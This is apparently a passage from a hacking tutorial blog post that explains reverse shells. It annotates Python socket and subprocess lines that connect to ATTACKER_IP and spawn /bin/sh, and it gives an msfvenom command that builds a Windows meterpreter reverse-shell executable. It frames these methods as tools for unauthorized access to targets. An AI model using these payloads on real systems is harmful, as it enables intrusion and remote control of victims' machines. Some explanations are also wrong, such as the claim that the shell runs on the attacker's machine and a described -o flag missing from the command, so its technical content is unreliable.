socket.socket(socket.AF_INET, socket.SOCK_STREAM) - If you're familiar with python programming, you'll be well aware that python has a socket library, which has functions and methods responsible for socket programming. This line calls for the socket() function within the socket library. Within the brackets are the parameters which are to be passed into the socket() function, which are the AF_INET, responsible for the Internet IP Address family which is IPV4. SOCK_STREAM is the socket type for TCP, the protocol used to transport messages in the network.

s.connect(("ATTACKER_IP",ATTACKER_PORT)) - this makes use of the connect() method within the socket library, and this is where the attacker will then specify the IP and PORT the attacker is responsible for.

p=subprocess.call([/bin/sh, "-i"]) - The subprocess module in Python is used to create new processes. This then calls the process /bin/sh, which is the path of where sh or bash is so it can be executed. This all happens on the attacker's machine in order to have remote /bin/bash access.

Other ways to create reverse shells is to craft payloads using executable binaries like .exe files for Windows. Best way to do this is using the Metasploit Framework.

Msfvenom is a command-line instance of The Metasploit Framework that is used to generate and output all of the various types of shellcode that are available in Metasploit. 

~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="ATTACKER_IP" LPORT="ATTACKER_PORT" -f exe revshell.exe

Flags: 

LHOST = (IP of Attacker Machine) 

LPORT = (PORT for the Attacker Machine) 

-p = (Payload I.e. Windows, Android, PHP etc.) 

F = file extension (i.e. windows=exe, android=apk etc.) 

o = “out file” to write to a location, which in this case is in the current working directory.

Once this executable file is dropped onto a remote target and executed, the reverse shell will be initiated, giving the attacker remote access.

Rounding Up

There are many other payloads and methods of initializing reverse shells for unauthorized remote access. This just gives a basic run down of how to do them in the simplest ways I know possible. Of course to be a successful hacker, intensive research is required within the domain of IT. This will allow you to have more creative approaches to create, drop reverse shells or even have your target execute reverse shells so you can have the remote access. Note that these methods (along with the others you will be researching cuz hacking is all about research) are also applicable for CTF challenges. Got more hacking tutorials comin up. Stay Tuned.